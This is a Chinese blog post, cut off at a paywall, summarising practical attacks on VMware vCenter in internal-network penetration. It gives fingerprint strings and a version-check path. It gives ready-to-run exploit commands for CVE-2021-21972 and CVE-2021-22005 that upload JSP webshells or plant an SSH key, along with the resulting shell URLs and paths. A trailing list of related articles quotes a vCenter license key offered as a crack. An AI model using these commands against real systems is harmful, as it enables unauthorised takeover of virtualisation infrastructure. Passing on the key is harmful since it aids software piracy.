Vcenter实战利用方式总结

原创 已于 2023-10-24 10:58:34 修改 · 515 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#1024程序员节 #网络安全 #web安全 #python #开发语言

于 2023-10-24 10:37:32 首次发布
本文总结了内网渗透中针对Vmware Vcenter的实战打法,包括指纹特征识别、多个CVE漏洞利用(如CVE-2021-21972、CVE-2021-22005、CVE-2021-44228)以及获取vcenter-web控制台和虚拟机权限的方法,如重置密码、cookie登录、利用数据库解密等。

目录

0x01 指纹特征

0x02 查看Vcenter版本

0x03 CVE-2021-21972

0x04 CVE-2021-22005

0x05 CVE-2021-44228

0x06 获取vcenter-web控制台权限

重置密码

cookie登录

不重置获取密码(ESXI)

1、获取解密key

2、获取数据库账号密码

3、使用脚本解密

4、登录ESXI

0x07 获取虚拟机权限

在内网渗透中常常会碰到VmwareVcenter,对实战打法以及碰到的坑点做了一些总结,部分内容参考了师傅们提供的宝贵经验,衷心感谢各位师傅

0x01 指纹特征

title="+ ID_VC_Welcome +"

image.png

0x02 查看Vcenter版本

/sdk/vimServiceVersions.xml

image-20220902150355359.png

0x03 CVE-2021-21972

影响范围

  • vCenter Server7.0 < 7.0.U1c
  • vCenter Server6.7 < 6.7.U3l
  • vCenter Server6.5 < 6.5.U3n
/ui/vropspluginui/rest/services/uploadova

访问上面的路径,如果404,则代表不存在漏洞,如果405 则可能存在漏洞

image-20220724170308995.png


windows机器:

漏洞利用: GitHub - horizon3ai/CVE-2021-21972: Proof of Concept Exploit for vCenter CVE-2021-21972

python CVE-2021-21972.py -t x.x.x.x -p ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\gsl.jsp -o win -f gsl.jsp

-t (目标地址)
-f (上传的文件)
-p (上传后的webshell路径,默认不用改)

image-20220724170308995.png


上传后的路径为

https://x.x.x.x/statsreport/gsl.jsp

完整路径为

C:/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport

image-20220813172742556.png


Linux机器:

1、写公私钥(需要22端口开放)

python3 CVE-2021-21972.py -t x.x.x.x -p /home/vsphere-ui/.ssh/authorized_keys -o unix -f id_rsa_2048.pub

2、遍历写shell(时间较久)

GitHub - NS-Sp4ce/CVE-2021-21972: CVE-2021-21972 Exploit

image-20220829190235482.png

0x04 CVE-2021-22005

影响范围

  • vCenter Server 7.0 < 7.0 U2c build-18356314
  • vCenter Server 6.7 < 6.7 U3o build-18485166
  • Cloud Foundation (vCenter Server) 4.x < KB85718 (4.3)
  • Cloud Foundation (vCenter Server) 3.x < KB85719 (3.10.2.2)
  • 6.7 vCenters Windows版本不受影响

漏洞利用

https://github.com/r0ckysec/CVE-2021-22005

cve-2021-22005_exp_win.exe -u https://x.x.x.x --shell

image-20220813184455354.png

https://github.com/rwincey/CVE-2021-22005/blob/main/CVE-2021-22005.py

python cve-2021-22005.py -t https://x.x.x.x

image-20220813190026044.png

连接webshell

https://x.x.x.x/idm/..;/test.jsp

image-20220813185938630.png

上传后的webshell完整路径为

/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/xx.jsp

0x05 CVE-2021-44228

利用l

最低0.47元/天 解锁文章
vCenter 漏洞利用总结
渗透之路,攻防之间皆学问
07-24 4813
VMware vCenter是VMware公司推出的集中化虚拟化管理平台。它是VMware vSphere虚拟化解决方案的核心组件之一。vCenter的主要功能是管理和监控整个vSphere虚拟化基础架构,包括多个ESXi主机和虚拟机。vSpherevSphere是VMware的虚拟化平台的总称,它是一套完整的虚拟化解决方案,包括了多个组件和功能,用于构建和管理虚拟化环境。
C++开源界面库duilib的使用细节与实战技巧总结(实战经验分享)
dvlinker的技术专栏
07-29 2万+
本文详细分享C++开源界面库duilib的使用细节与实战技巧。
vCenter Server无法解密存储在自定义规范中的密码
Arlo的博客
12-02 1015
在使用虚拟机自定义规范克隆虚拟机的时候,出现错误:vCenter Server无法解密存储在自定义规范中的密码 网上查找了一些资料无用: https://kb.vmware.com/s/article/51719?lang=zh_CN 解决办法:删除原有的自定义规范,重新创建一个新的即可解决。 ...
记一次VMware vCenter渗透过程(主要是踩坑分享)
2401_83799022的博客
06-26 1686
如果访问https ://ip :port,跳转到了某个域名链接,那么/SSO/后面跟的就是该域名。该工具,在VM安装目录下自带,就不用去别的地方下载了。选中VM图标,右键“打开文件位置”即可。因为机器都是生产相关的机器,不能使用克隆虚拟机等的骚操作,所以这里只介绍生成快照的方式。进到控制台后,如果发现域控机器,就可以使用生成快照,然后用工具分析快照文件抓hash。添加完后注意,不要直接刷新,而是访问https: //ip/ui,否则就会这样。环境问题可能会浪费很多时间,回头不行再看,这里换个脚本。
openstark-StarVCenter云平台软件
故南思北的博客
11-07 1296
2.配置IP地址(1)点击“Configure”按钮,选择“IPv4 Settings”,将“Method”设置为“Manual”。进入之前安装的StarVCenter管理界面,在“资源管理”>“扩充计算节点”菜单下依次执行“添加”、“配置网卡用途”、“一键部署”即可。继续点击“下一步”按钮,确认虚拟机配置,然后点击“开始创建”按钮,开始创建虚拟机。大约需要几秒钟完成创建,进入“虚拟机管理”>“虚拟机”菜单中能看到刚创建的虚拟机,点击右侧操作栏的“启动”按钮,启动虚拟机。
通过恢复GRUB来破解vCenter 6.0的ROOT密码
07-06 1642
系统版本这就是登录界面,当然我们是不知道密码的,待会就要把这个密码给重置了,其实这种技术严谨来说不能称之为“破解”。因为它是属于Linux系统的内置机制,只能算Linux技术范畴之一。废话不多说,直接进入正题一、首先重启系统,在操作系统启动后,出现 GRUB 引导加载程序后,快速按一下方向键,让菜单停留在 GNU GRUB 菜单。键入 p, 输入 GRUB 密码。如下图。(一定要开机时候赶紧按,不然就会启动vcenter系统。就行Windows进bios一样,别错过机会)备注:(1)如果部署 VCSA 时,
干货分享 | VMware vCenter漏洞实战利用总结
mingyqf的博客
01-31 3126
零队 [EchoSec](javascript:void(0)😉收录于合集#vmware1个文章来源:零队**前言**Vcenter一般指VMware vCenter Server,其提供了一个可伸缩、可扩展的平台,为虚拟化管理奠定了基础,可集中管理VMware vSphere环境,与其他管理平台相比,极大地提高了IT管理员对虚拟环境的控制,Vcenter可以使管理员从一个位置深入了解虚拟基础架构的集群、主机、虚拟机、存储、客户操作系统和其他关键组件等所有信息。利用思路。
VMware vcenter/ESXI系列漏洞总结
热门推荐
李同學的安全圈
06-22 3万+
本文章主要对VMware ESXI、VMware VCenter系列进行漏洞整理,更多内容后续补充!
VMware vCenter 5.0:服务器与主机管理实战指南
vCenter Server是VMware vSphere架构中的核心组件,它集中控制和管理多个ESXi主机,提供了一种统一的方式来监控、配置和操作虚拟机及整个数据中心。 **vCenter Server和ESXi 5.0** vCenter Server是vSphere平台的...
VMware16.2安装StarVCenter无法虚拟化问题
WHY的博客
09-14 1106
VMware16.2安装StarVCenter无法虚拟化问题
CVE-2021-21972:适用于vCenter CVE-2021-21972的概念证明漏洞
03-04
CVE-2021-21972 vCenter CVE-2021-21972的概念证明利用 研究来源: : : 已在Windows和Unix vCenter VCSA目标上进行了测试。 用法 要良性地检查目标是否易受攻击,只需提供--target参数即可。 要利用此漏洞,请提供--file,-path和--operating-system标志。 将--file参数中提供的文件写入--path参数中指定的位置。 Windows目标: 通过将Webshel​​l cmdjsp.jsp上传到PtSwarm指示的/ statsreport端点进行了测试。 该Webshel​​l在NT AUTHORITY / SYSTEM的上下文中执行命令。 Unix目标: 该文件将在vsphere-ui用户的上下文中写入。 如果目标易受攻击,但利用失败,则可能是vsphere-ui用户没有写指定路径
CVE-2021-21972:CVE-2021-21972 VMware vCenter metasploit利用脚本中的未经授权的RCE
03-08
CVE-2021-21972 CVE-2021-21972 VMware vCenter metasploit利用脚本中的未经授权的RCE 准备 git clone https://github.com/TaroballzChen/CVE-2021-21972 cd CVE-2021-21972 mkdir -p ~ /.msf4/modules/exploits/multi/http cp * ~ /.msf4/modules/exploits/multi/http chmod +x ~ /.msf4/modules/exploits/multi/http/vmware_vcenter_server_unauthenticated_file_upload_exploit.py msfconsole metasploit用法 set target <target> set PAYLOAD
记录一次安装StarVCenter
发量堪忧
04-10 9710
简介 StarVCenter是新一代轻量级的IaaS软件,它能为你快速构建一个智能的中小型机房甚至大型数据中心,提供IT基础设施云服务能力。传统的计算、存储、网络资源将被抽象成极简化的管理模型,普通的机房管理员就可以轻松地搭建并管理云。 首先把镜像烧入U盘,然后安装在服务器上 安装步骤如下 安装完成 安装第一台虚拟机 先上传系统到StarVCenter服务器里面 第一台虚拟机部署完成,但是有没有看到网卡驱动没用,所以还要进行驱动安装
vcenter安装与许可证破解
qq_25096749的博客
03-29 4689
vcenter用于管理esxi的。
VMware vCenter CVE-2020-3952 项目常见问题解决方案
gitblog_01104的博客
12-21 536
VMware vCenter CVE-2020-3952 项目常见问题解决方案 项目基础介绍 该项目是针对VMware vCenter中的一个安全漏洞CVE-2020-3952的开源利用代码。该漏洞允许攻击者通过网络连接控制vCenter Directory,进而控制vSphere部署。项目主要使用Python编程语言,依赖于python-ldap库来实现LDAP绑定请求和用户添加等功能。 新手常...
VMware“后门”实录:当黑客盯上你的vCenter集群,这不仅仅是一次渗透(非常详细)从零基础到精通,收藏这篇就够了
最新发布
Python_0011的博客
05-10 644
vCenter就是个“小域控”,拿下它,等于打开了整个内网的大门。里面的虚拟机、ESXI主机,都是你的“猎物”。关注vCenter自身的安全漏洞,及时打补丁,积极应对来自终端的攻击威胁。亡羊补牢,为时未晚。```黑客/网络安全学习包资料目录成长路线图&学习规划配套视频教程SRC&黑客文籍护网行动资料黑客必读书单面试题合集因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享1.成长路线图&学习规划。
ESX Server 4.1的安装与破解全过程(三)
流云随风
03-23 2万+
<br />五、安装Vcenter Server 4.1管理服务器<br />这里服务器的地址为:192.168.12.223,在配置客户端的时候,是需要用到这个地址的。<br />注意事项:<br />1、Vmware Vsphere Vcenter Server 4.1的系统必须为windows 64位的操作系统。<br />2、安装Vmware Vsphere Vcenter Server 4.1可以使用虚拟机,但是需要注意虚拟机的内存和磁盘空间。内存至少为512M,磁盘空间请保证在10G以上,不然安
vCenter Server Appliance(VCSA)6.7安装部署
BQ Blog
10-23 4945
在开始本教程前,确保你已经至少有了一个ESXi系统,VCSA需要安装到ESXi中。VCSA用来管理ESXi,当有一台及以上ESXi系统时,就可以考虑VCSA。许可证秘钥:1F008-4T3EH-M8488-F22GH-9GHP0。主机添加完成后,可以对ESXi主机及其虚拟机进行管理。填写ESXi 的IP、用户名、密码,点击下一页。右键数据中心,点击添加主机,即ESXi。部署类型选择第一个,再点击下一页。破解60天许可证,点击管理许可证。选择自己想要安装的硬盘,确认部署信息后,点击完成。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值